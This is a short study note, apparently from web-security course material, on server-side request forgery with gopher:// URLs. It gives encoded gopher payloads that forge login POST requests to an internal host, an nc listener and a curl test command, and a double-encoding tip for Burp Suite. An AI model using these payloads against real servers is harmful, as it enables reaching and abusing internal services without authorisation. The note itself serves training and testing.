Skip to content

SSRF with gopher

Curl supports the Gopher protocol. We can use Gopher URLs to create valid requests in several different protocols, including HTTP.

application/x-www-form-urlencoded

gopher://10.10.10.3:80/_POST%20/login%20HTTP/1.1%0aContent-Type:%20application/x-www-form-urlencoded%0aContent-Length:%2041%0a%0ausername%3dwhite.rabbit%26password%3ddontbelate
Pasted image 20230523193615.png

application json

gopher://10.10.10.3:80/_POST%20/login%20HTTP/1.1%0aContent-Length:%2051%0aContent-Type:%20application/json%0a%0a%7b%22username%22%3d%22white%2erabbit%22%2c%22password%22%3d%22dontbelate%22%7d

Pasted image 20230523193359.png Test on local machine: 

nc -nvlp 9000


curl gopher://127.0.0.1:9000/_POST%20/login%20HTTP/1.1%0aContent-Length:%2051%0aContent-Type:%20application/json%0a%0a%7b%22username%22%3d%22white%2erabbit%22%2c%22password%22%3d%22dontbelate%22%7d


💡 If we were to replicate this attack from curl or in the Repeater tool of Burp Suite, we would need to double encode any non-alphanumeric characters as well.
2023090518224444 SSRF with gopher#^13919b

References

  1. web200, p. 409
  2. https://owasp.org/www-community/Double_Encoding ^13919b